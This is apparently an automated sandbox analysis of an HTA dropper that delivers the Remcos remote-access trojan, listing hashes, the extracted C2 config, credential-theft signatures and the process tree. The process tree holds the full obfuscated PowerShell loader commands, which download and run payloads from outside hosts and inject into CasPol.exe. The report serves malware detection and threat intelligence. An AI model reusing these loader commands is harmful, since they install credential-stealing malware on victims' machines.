Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
07-02-2025 13:30
Static task
static1
Behavioral task
behavioral1
Sample
niceskillwithbetterservicegoodgirlmylover.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
niceskillwithbetterservicegoodgirlmylover.hta
Resource
win10v2004-20250129-en
General
-
Target
niceskillwithbetterservicegoodgirlmylover.hta
-
Size
14KB
-
MD5
59123cec8e9618aeaa7236be2489518f
-
SHA1
43d7d2d922d19407897165e0d30644a8fa409623
-
SHA256
eae0a340faa2c93a9f0829ac6a1d1ea7323089f3eb5f3966153b1e4967e631e6
-
SHA512
427e7392bc9cd679d0e25a34f9e48f9696556208dd945f0d418f0a06d41106a3eae2c009eaccfe706ea237d15521c81cb99008c1d173578355e47226b448b99e
-
SSDEEP
48:3au7yrUM7CCrUXkEkgozHc699DdDfbyy1bUB0a0su7+7DaWrUh7LG:quygcCCgPRadfZfGy1m0a0R+Lg96
Malware Config
Extracted
remcos
RemoteHost
172.245.123.12:8690
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-M39SJI
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/944-110-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/1764-108-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/184-107-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/1764-108-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/184-107-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 24 4568 powershell.exe 27 1580 powershell.exe 28 1580 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 4568 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 1580 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1580 set thread context of 3252 1580 powershell.exe 103 PID 3252 set thread context of 184 3252 CasPol.exe 105 PID 3252 set thread context of 1764 3252 CasPol.exe 106 PID 3252 set thread context of 944 3252 CasPol.exe 107 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 4568 powershell.exe 4568 powershell.exe 1580 powershell.exe 1580 powershell.exe 1580 powershell.exe 1580 powershell.exe 1580 powershell.exe 1580 powershell.exe 184 CasPol.exe 184 CasPol.exe 944 CasPol.exe 944 CasPol.exe 184 CasPol.exe 184 CasPol.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 3252 CasPol.exe 3252 CasPol.exe 3252 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4568 powershell.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 944 CasPol.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3252 CasPol.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 5060 wrote to memory of 4872 5060 mshta.exe 85 PID 5060 wrote to memory of 4872 5060 mshta.exe 85 PID 5060 wrote to memory of 4872 5060 mshta.exe 85 PID 4872 wrote to memory of 4568 4872 cmd.exe 88 PID 4872 wrote to memory of 4568 4872 cmd.exe 88 PID 4872 wrote to memory of 4568 4872 cmd.exe 88 PID 4568 wrote to memory of 1964 4568 powershell.exe 90 PID 4568 wrote to memory of 1964 4568 powershell.exe 90 PID 4568 wrote to memory of 1964 4568 powershell.exe 90 PID 1964 wrote to memory of 3128 1964 csc.exe 91 PID 1964 wrote to memory of 3128 1964 csc.exe 91 PID 1964 wrote to memory of 3128 1964 csc.exe 91 PID 4568 wrote to memory of 1080 4568 powershell.exe 97 PID 4568 wrote to memory of 1080 4568 powershell.exe 97 PID 4568 wrote to memory of 1080 4568 powershell.exe 97 PID 1080 wrote to memory of 1580 1080 WScript.exe 98 PID 1080 wrote to memory of 1580 1080 WScript.exe 98 PID 1080 wrote to memory of 1580 1080 WScript.exe 98 PID 1580 wrote to memory of 2220 1580 powershell.exe 101 PID 1580 wrote to memory of 2220 1580 powershell.exe 101 PID 1580 wrote to memory of 2220 1580 powershell.exe 101 PID 1580 wrote to memory of 4172 1580 powershell.exe 102 PID 1580 wrote to memory of 4172 1580 powershell.exe 102 PID 1580 wrote to memory of 4172 1580 powershell.exe 102 PID 1580 wrote to memory of 3252 1580 powershell.exe 103 PID 1580 wrote to memory of 3252 1580 powershell.exe 103 PID 1580 wrote to memory of 3252 1580 powershell.exe 103 PID 1580 wrote to memory of 3252 1580 powershell.exe 103 PID 1580 wrote to memory of 3252 1580 powershell.exe 103 PID 1580 wrote to memory of 3252 1580 powershell.exe 103 PID 1580 wrote to memory of 3252 1580 powershell.exe 103 PID 1580 wrote to memory of 3252 1580 powershell.exe 103 PID 1580 wrote to memory of 3252 1580 powershell.exe 103 PID 1580 wrote to memory of 3252 1580 powershell.exe 103 PID 3252 wrote to memory of 184 3252 CasPol.exe 105 PID 3252 wrote to memory of 184 3252 CasPol.exe 105 PID 3252 wrote to memory of 184 3252 CasPol.exe 105 PID 3252 wrote to memory of 184 3252 CasPol.exe 105 PID 3252 wrote to memory of 1764 3252 CasPol.exe 106 PID 3252 wrote to memory of 1764 3252 CasPol.exe 106 PID 3252 wrote to memory of 1764 3252 CasPol.exe 106 PID 3252 wrote to memory of 1764 3252 CasPol.exe 106 PID 3252 wrote to memory of 944 3252 CasPol.exe 107 PID 3252 wrote to memory of 944 3252 CasPol.exe 107 PID 3252 wrote to memory of 944 3252 CasPol.exe 107 PID 3252 wrote to memory of 944 3252 CasPol.exe 107
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\niceskillwithbetterservicegoodgirlmylover.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c pOwershElL -eX bYPAsS -NOP -w 1 -c deVICecReDEntIaLdEPLOyMenT.EXe ; iEx($(IEx('[systEm.teXt.eNcoDiNG]'+[chAR]58+[ChaR]0X3A+'uTF8.GeTString([syStEm.CoNVERt]'+[chAr]0X3a+[cHar]0X3A+'FrOmbasE64sTrIng('+[CHAR]0X22+'JFpWaVRpUzBNMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iRXJERUZpTkl0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6WVJta2tqbyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqZ2ZXenJtQmFlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFViZ3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtBRExJbW9oLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERESnJiWmZoREgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJQbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEV0eGJwZ0lqTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWlZpVGlTME0wOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuODYvNzcwL25pY2Vza2lsbHdpdGhiZXR0ZXJzZXJ2aWNlZ29vZGdpcmxteWxvdmVyLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlc2tpbGx3aXRoYmV0dGVyc2VydmljZWdvb2RnaXJsbXlsb3ZlcmVnb28udmJzIiwwLDApO3NUYVJULVNsRWVwKDMpO2lOVm9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxuaWNlc2tpbGx3aXRoYmV0dGVyc2VydmljZWdvb2RnaXJsbXlsb3ZlcmVnb28udmJzIg=='+[cHaR]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOwershElL -eX bYPAsS -NOP -w 1 -c deVICecReDEntIaLdEPLOyMenT.EXe ; iEx($(IEx('[systEm.teXt.eNcoDiNG]'+[chAR]58+[ChaR]0X3A+'uTF8.GeTString([syStEm.CoNVERt]'+[chAr]0X3a+[cHar]0X3A+'FrOmbasE64sTrIng('+[CHAR]0X22+'JFpWaVRpUzBNMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iRXJERUZpTkl0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6WVJta2tqbyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqZ2ZXenJtQmFlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFViZ3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtBRExJbW9oLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERESnJiWmZoREgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJQbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEV0eGJwZ0lqTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWlZpVGlTME0wOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuODYvNzcwL25pY2Vza2lsbHdpdGhiZXR0ZXJzZXJ2aWNlZ29vZGdpcmxteWxvdmVyLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlc2tpbGx3aXRoYmV0dGVyc2VydmljZWdvb2RnaXJsbXlsb3ZlcmVnb28udmJzIiwwLDApO3NUYVJULVNsRWVwKDMpO2lOVm9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxuaWNlc2tpbGx3aXRoYmV0dGVyc2VydmljZWdvb2RnaXJsbXlsb3ZlcmVnb28udmJzIg=='+[cHaR]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rvwk3bra\rvwk3bra.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA0F3.tmp" "c:\Users\Admin\AppData\Local\Temp\rvwk3bra\CSCB421AB536A634203A3C1DB9CE0A619.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:3128
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\niceskillwithbetterservicegoodgirlmyloveregoo.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AcgBlAHYAbwBsAHkAbQBsAHIAaQBnAGQAbwBvAGcAZQBjAGkAdgByAGUAcwByAGUAdAB0AGUAYgBoAHQAaQB3AGwAbABpAGsAcwBlAGMAaQBuAC8AMAA3ADcALwA2ADgALgAzADIAMQAuADUANAAyAC4AMgA3ADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AMQAwADAAOAAuAGYAaQBsAGUAbQBhAGkAbAAuAGMAbwBtAC8AYQBwAGkALwBmAGkAbABlAC8AZwBlAHQAPwBmAGkAbABlAGsAZQB5AD0AagB6AHcARQBIAEEASgBQAHgASwBMAEwAegBnAFoARgBoAFkAVgBBAFEATQBBAE8ARQBOAEgAMQBRAHcAdgA4AGEAcwBFAG4ANAAzAHIATgBIADgAdwBPAGcAcQB4AGcATABOADUAeQBnAGcARQBLAGgAOQBFAGcAQQA5ADcARwBnAGMATABYAFEAZwAmAHAAawBfAHYAaQBkAD0AMwA0ADIAOAAwADMAZAAxAGMAYwA0AGUAMwBiADgAMAAxADcAMwA4ADgAOAAyADQAOQA1AGIANQBmAGUAOQBkACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵PID:2220
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵PID:4172
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zadszjaqctzjpk"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:184
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\buiczblkqbrozqrtu"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:1764
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\mwvvauwlejjbbxnxdaop"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:944
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
102B
MD5b180dbda70ecfdd0d260939ad19d050e
SHA14f43072cc53b7a395ddc223fbf8cf4bc86c1e505
SHA256973ddf3e6ccb2cad4bfe522084a866902e9d7b2e7873e04c6ee84d587995a90d
SHA512bc60aecca2a5733dca0d685c4a0684a845bf02f2479b864cb65fb18521e2a4bbed37d0164a7ff82473eb64ccba09c18bb8535c1fd0ca16d52aa4a800d38ebb5e
-
Filesize
2KB
MD59faf6f9cd1992cdebfd8e34b48ea9330
SHA1ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA2560c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA51205b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97
-
Filesize
19KB
MD58568dc2d098f506afcca93f32728bc70
SHA12623f26880bbe836b4a0bcf4010c05291b4cfc8e
SHA256fe89e03757f32e1f54a31897c43e5cb4ae8b19d9141b53aa7e92d7f8cca954d2
SHA512baffadb1f46059858100defee50cd87f76c9cf7f69f39639bfb4d29162db4b3bfd8e59e385e58b5796177e5a66f145b64d98f010473461d48aea508a2d1a1c1e
-
Filesize
1KB
MD5fb11a15d1a9ee75c8b2cd89dc4924f8f
SHA1369eb5da2ddfa727d4519f7c35078d7b95141af3
SHA25613e035f7d7b94e5371ca851e859bf5233a2a31b136c8e9c3a530c3956170d858
SHA51211ca237530718d323429a04732a7bd1c2b7d6feb3cd9ba2ecbb01d529b67c18b65d9f285c5f942e19cf99dbee463839d7fec4166ae0ae2938629ab6c6444cee3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5b7330f6297d8ed5f2cb1a66c9241e4e6
SHA1604e1e67acda19c6d7dbc2808bb5f5d922e69b17
SHA256f0202bc1224c698052abdeb499faeb5a94a1f080228f77af56b05ec94a11789c
SHA5129b88fcbcdc914199828a326e3270b0d7a8ba7907bb87d81aa6526c84a9aaeed1a929b843e993d59b8a56394eca2b45db5076f506391ee79459369fc81f1d34c6
-
Filesize
4KB
MD5602636ec0f565fc073f965104c453062
SHA14269ce342b8169d50b831ba03216919555325717
SHA2568e25d991be4c241761f66f71b429a82ea6929993f97637a01a219343507749f8
SHA512052e6f385c75d082653e5c4929b0eb9e443e03775f0e1d0e52e64b44534548403ffd0da39975acfe975e30f9c22b1956cc0b808d109b3b681d9331b82e566c10
-
Filesize
189KB
MD5e46a3153fbce8c6b616865a299f84b0f
SHA168d8ab3028dcc62397119843f95866b04940e1ce
SHA25615c6eaf3a7debf24c49a4609b6a2c3c9ad2632b39fa8570766a5df077c12009b
SHA512c67f63ec7046578cd525408b17f05bacf614b72f4bc3d60bd6b14b37b17b7b587a48f83c5d669f0aaafc2c2dca382268e39b4e145de28b7967e1a22e28e8bc0c
-
Filesize
652B
MD52cbbadbcd38bb6db60aefb004207305c
SHA1463779c219245a67325979820166e715500cd017
SHA256adf95611af16a68b0021a86c5c121feb1b667a5388932fdb4f417ea02a3a8097
SHA512e76f8a9b75f18d31d1b4f87726f4d5f478720ac09f059799a10ddc1a1df8c9463c05ff981f586a016bbd38d8d20a5f680cd008cd887a92b951941b5f7362e2d2
-
Filesize
489B
MD506ce6df8c264b461dcdeef00df36b8de
SHA1050df9c041ebca4c7e6cf8febddcb80e95f55769
SHA256ab829027e3a474c684b12b0abce9ef3601a2695b3ddd6d5b699e7df0482b2e28
SHA51203a1d3e658866433b928601123c1ae3cf89262661b9143a0eadb5a99c27ed45eb2d3aef17461c1e5b2e60ddad024378cd99786be101371aa09e4122d0bf9be6f
-
Filesize
369B
MD5bf81eb86f67c839ccfaa8aa68f9e7f60
SHA16219fd8914f27caf5b1696de9b63c9b39be0fc57
SHA2566b6ad507cf3c0668a52127d6d7f38024aaf67d964561d2ad50413fbe1c944a0e
SHA5121cb5e76090f99689d715ce02c013f21ffb9c8979e38070e9836bde0eb8774d28b864135f59cacc4c642c68583b31797dcc5480172882dbbafeabed89c68570ff